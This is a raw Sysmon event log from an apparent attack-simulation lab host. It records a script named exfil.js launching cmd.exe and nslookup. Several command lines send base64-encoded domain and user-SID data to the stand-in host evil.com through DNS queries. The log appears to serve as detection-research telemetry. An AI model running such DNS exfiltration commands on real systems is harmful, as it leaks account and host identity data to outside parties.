C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-3E44-000000005F02}4212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlltciii.tmp 2>&1 10341000x8000000000000000210420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.797{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3F44-000000005F02}4484C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.797{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3F44-000000005F02}4484C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.797{2E1864BB-18EF-629A-3F44-000000005F02}44842104C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3E44-000000005F02}4212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.797{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3F44-000000005F02}4484C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3E44-000000005F02}4212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-18E0-629A-6742-000000005F02}3976304C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-3E44-000000005F02}4212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.794{2E1864BB-18EF-629A-3E44-000000005F02}4212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlltciii.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldwq.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-18EF-629A-3C44-000000005F02}39687632C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3D44-000000005F02}5136C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3D44-000000005F02}5136C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.760{2E1864BB-18EF-629A-3B44-000000005F02}68245352C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-3D44-000000005F02}5136C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.766{2E1864BB-18EF-629A-3D44-000000005F02}5136C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-3B44-000000005F02}6824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwq.tmp 2>&1 10341000x8000000000000000210400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.744{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3C44-000000005F02}3968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.744{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3C44-000000005F02}3968C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.728{2E1864BB-18EF-629A-3C44-000000005F02}39687632C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3B44-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3C44-000000005F02}3968C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3B44-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-18E0-629A-6742-000000005F02}39762060C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-3B44-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.721{2E1864BB-18EF-629A-3B44-000000005F02}6824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 